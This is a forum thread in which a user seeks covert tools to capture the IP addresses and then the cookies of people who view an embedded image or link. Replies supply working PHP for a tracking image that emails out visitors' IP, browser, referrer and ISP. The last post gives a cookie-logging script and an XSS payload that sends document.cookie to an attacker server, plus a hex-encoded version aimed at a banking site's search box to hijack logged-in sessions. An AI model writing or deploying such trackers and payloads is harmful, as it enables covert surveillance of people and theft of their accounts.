14 replies to this topic

[deviouz]

Does anyone know of any websites that you can enter in you email and the site gives you a specific link to use to get peoples IP's when they visit the link and then it sends the IP to your email..

I remember using a site like this a few years back that had pictures of monkeys on it, but i can seem to find it any more or i just cant remeber what the site was called.

anybody know of anything like this at all..??

[00110]

there are many script u can use them in your site (or one page) :

http://www.hotscripts.com/Detailed/35909.html
http://www.hotscripts.com/Detailed/32103.html
http://www.hotscripts.com/Detailed/2774.html

[deviouz]

Does anyone know any IP loggers that use an image that can be embedded anywhere like in an email or myspace or somewhere and when anyone views that image the IP logger gets there IP and other details and then saves it into a .TXT or emails me them..??

Anything like this at all..??
I've been searching Google for a while now & cant seem to find anything to suite my needs..??
anybody got any suggestions..??

[webdevil]

This is something quite simple.
1-You put a picture on your server.
You need to have a server where you can check logs.
2-Hotlink your image in an email.
Display your image. Like you do in html. Its an html email! Dont paste the image, just use the link.
3-Send it to someone.
I dont think this needs explanation
4-When someone views the email, the picture that you put in the email loads from your server.
5-You go to your logs and check for the ip address.

This is to give you a idea on what is to happen. It shouldnt take you time to create a php script which would send you an email for this.
If you dont have a server make your own one!

[colinsouth]

Does anyone know of any websites that you can enter in you email and the site gives you a specific link to use to get peoples IP's when they visit the link and then it sends the IP to your email..

I remember using a site like this a few years back that had pictures of monkeys on it, but i can seem to find it any more or i just cant remeber what the site was called.

anybody know of anything like this at all..??

It's been awhile since I did any real php, but I can't see why it couldn't be achieved using $_SERVER['REMOTE_ADDR']

Something like

<script language="php">
 $to = "your address";
 $subject = "Incoming IP Address";
 $body = "IP Address: ".$_SERVER['REMOTE_ADDR'];
 mail($to, $subject, $body);
 </script>

[colinsouth]

Does anyone know of any websites that you can enter in you email and the site gives you a specific link to use to get peoples IP's when they visit the link and then it sends the IP to your email..

I remember using a site like this a few years back that had pictures of monkeys on it, but i can seem to find it any more or i just cant remeber what the site was called.

anybody know of anything like this at all..??

It's been awhile since I did any real php, but I can't see why it couldn't be achieved using $_SERVER['REMOTE_ADDR']

Something like

<script language="php">
   $to = "your address";
   $subject = "Incoming IP Address";
   $body = "IP Address: ".$_SERVER['REMOTE_ADDR'];
   mail($to, $subject, $body);
   </script>

I've had a little play around and come up with this:

<script language="php">
header("Content-type: image/png");
/////////////////////////////////////////////////
$yourAddress = "colinsouth@gmail.com";
/////////////////////////////////////////////////
$im = imagecreatefrompng($yourImage);
imagepng($im);
imagedestroy($im);
if(isset($_GET['image'])){
	$yourImage = $_GET['image'];
} else {
	$yourImage = "http://www.ondrugs.co.uk/monkey/monkey.png";}
$to = $yourAddress;
$subject = "Incoming IP Address";
$body = "IP Address: ".$_SERVER['REMOTE_ADDR'];
$headers =  "From: " . $yourAddress . "\r\n" .
			"Reply-To: ". $yourAddress . "\r\n" .
			"X-Mailer: PHP/" . phpversion();
mail($to, $subject, $body, $headers);
</script>

Just change the variable at the top, $yourAddress being the email address you want IP addresses sent to, and upload it to your server then you can post images with the php as the src, for example:

<img src="http://www.yourserver.com/image.php?image=www.whatever.com/yourimage.png">

Then when someone views the page it will send you an email with their IP address in it when the image loads.

Notice that you can choose what image to display in the link by adding ?image=whatever. If not set it defaults to a funky monkey lol.

Hope this is what you wanted. Obviously its a very simple example maybe you can play around with it abit.

Col.

[deviouz]

sweet thanks man..
now how to implement it to also get the:

* DATE-TIME

* ISP

* BROWSER Agent

* OPERATING SYSTEM

* Referring Site

[Lorenzetti]

Using netcat is more easy than that methods...

[deviouz]

netcat huh..oh yeah. how so..??

so how would i format that code to send more infos..??
i tryd messing around with it putting in more code to get the more infos but it only seems to want to send the first one next to the $body =
this is what I was trying but had no luck getting all the infos..
[codebox]<script language="php">
header("Content-type: image/png");
/////////////////////////////////////////////////
$yourAddress = "colinsouth@gmail.com";
/////////////////////////////////////////////////
$im = imagecreatefrompng($yourImage);
imagepng($im);
imagedestroy($im);
if(isset($_GET['image'])){
$yourImage = $_GET['image'];
} else {
$yourImage = "http://www.ondrugs.c...y/monkey.png";}
$to = $yourAddress;
$subject = "Incoming IP Address";


$body = "IP Address: ".$_SERVER['REMOTE_ADDR'];
$browser = $_SERVER['HTTP_USER_AGENT'];
$referer = $_SERVER['HTTP_REFERER'];
$isp = gethostbyaddr($_SERVER['REMOTE_ADDR']);
$time = date('r');


$headers = "From: " . $yourAddress . "\r\n" .
"Reply-To: ". $yourAddress . "\r\n" .
"X-Mailer: PHP/" . phpversion();
mail($to, $subject, $body, $headers);
</script>[/codebox]

anybody know how to proper format it send me all those..??

[deviouz]

anyone know how to format the $body = part of this php ip logger to send me all those details..??

$body = "IP Address: ".$_SERVER['REMOTE_ADDR'];
$browser = $_SERVER['HTTP_USER_AGENT'];
$referer = $_SERVER['HTTP_REFERER'];
$isp = gethostbyaddr($_SERVER['REMOTE_ADDR']);
$time = date('r');

[colinsouth]

anyone know how to format the $body = part of this php ip logger to send me all those details..??

$body = "IP Address: ".$_SERVER['REMOTE_ADDR'];
$browser = $_SERVER['HTTP_USER_AGENT'];
$referer = $_SERVER['HTTP_REFERER'];
$isp = gethostbyaddr($_SERVER['REMOTE_ADDR']);
$time = date('r');

<script language="php">
header("Content-type: image/png");
/////////////////////////////////////////////////
$yourAddress = "youraddress@woteva.com";
/////////////////////////////////////////////////
$im = imagecreatefrompng($yourImage);
imagepng($im);
imagedestroy($im);
if(isset($_GET['image'])){
	$yourImage = $_GET['image'];
} else {
	$yourImage = "http://www.ondrugs.co.uk/monkey/monkey.png";}
$to = $yourAddress;
$subject = "Incoming IP Address";

$body = "IP Address: ".$_SERVER['REMOTE_ADDR']."
Browser: ". $_SERVER['HTTP_USER_AGENT']."
Referer: ".$_SERVER['HTTP_REFERER']."
ISP: ".gethostbyaddr($_SERVER['REMOTE_ADDR'])."
Time: ".date('r');

$headers =  "From: " . $yourAddress . "\r\n" .
			"Reply-To: ". $yourAddress . "\r\n" .
			"X-Mailer: PHP/" . phpversion();
mail($to, $subject, $body, $headers);
</script>

Haven't tested it but should work

[deviouz]

cool thanks, it sends all the info to my email now.

But the image part is not working though it just shows a broken image like this -->

can you only use PNG images or something or does the .php code contain some errors somewhere..?? cuz i tried using a .png image but it still doesn't show the image though.

and also when I view the logger.php directly from my hosted URL it says "The image “http://www.yourserver.com/image.php” cannot be displayed, because it contains errors."

<img src="http://www.yourserve...yourimage.png">
Notice that you can choose what image to display in the link by adding ?image=whatever. If not set it defaults to a funky monkey lol.

so how would I format the link for defaulting to the funky monkey pic listed inside the .php code here { $yourImage = "http://www.ondrugs.c...y/monkey.png";} instead of using the ?image=www.whatever.com/yourimage.png"> part inside image link..??
i tried this <img src="http://www.yourserve...com/image.php"> but it still doesnt show any image though..

what do you think is the prob..??

thanks for yer help..

[andydis]

www.statcounter.com

gives you free html code for this, dont see why it cant be embedded in a html email too.

[deviouz]

is there anyway to incorporate a cookie stealer into this php so it mails it to me along with the rest of the other datas..??

[narcos]

is there anyway to incorporate a cookie stealer into this php so it mails it to me along with the rest of the other datas..??

Cookie stealing 101:

The following PHP is used to to receive and save cookies sent via a GET request. Going to http://www.foobar.co...=BlahBlahCookie will write the cookie paramter to cookieJar.txt. (Ensure the file exists and is chmod 777 or so)

<?php
  
  
  $fh = fopen("cookieJar.txt", 'a') or die("can't open file");
  $cookie = $_GET['cookie'];
  $redir="http://www.foo.com";
  
  print "I ate your  cookie - ".  $cookie;
  fwrite($fh, $cookie);
  
  ?>
  <HEAD><meta http-equiv="REFRESH" content="0;url=$redir"></HEAD>
  <body></body></html>

The usual way to steal a cookie is to direct a user to the above link from a page in which they are currently using a cookie with code of the form:

<script>document.location="http://www.yourWebserver.blah/cookieSteal.php?cookie="+document.cookie</script>

So for example, if this forum had an flaw such that I could insert JavaScript into my post, anyone viewing my post could have their cookie stolen and sent to my webserver. I'd set the referrer page in the PHP code to the main governmentsecurity page so they'd be bounced right back without even noticing.

Another approach is with XSS. If a site is XSS vulnerable, say, through a search box, I can insert similar code. So I'd email you a link of the form:

http://www.aSuperSecureInternetBankingPortal/search?term=<script>document.location="http://www.yourWebserver.blah/cookieSteal.php?cookie="+document.cookie</script>

OK cool, but that address is pretty dodge, you'd have to be silly to follow such a link, but what about:

http://www.aSuperSecureInternetBankingPortal/search?term=<script%3E%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%79%6F%75%72%57%65%62%73%65%72%76%65%72%2E%62%6C%61%68%2F%63%6F%6F%6B%69%65%53%74%65%61%6C%2E%70%68%70%3F%63%6F%6F%6B%69%65%3D%22%2Bdocument.cookie%3C%2F%73%63%72%69%70%74%3E

Not so obvious that you're gonna get hacked now... (Simply converting part of the URL into Hex values)

If the above "internet banking site" example doesn't filter its in/output I could now insert that JScript into your browser. Assuming you'd first have to login to your banking to make use of the search function, I now have your cookie, and therefore your gold.

-narcos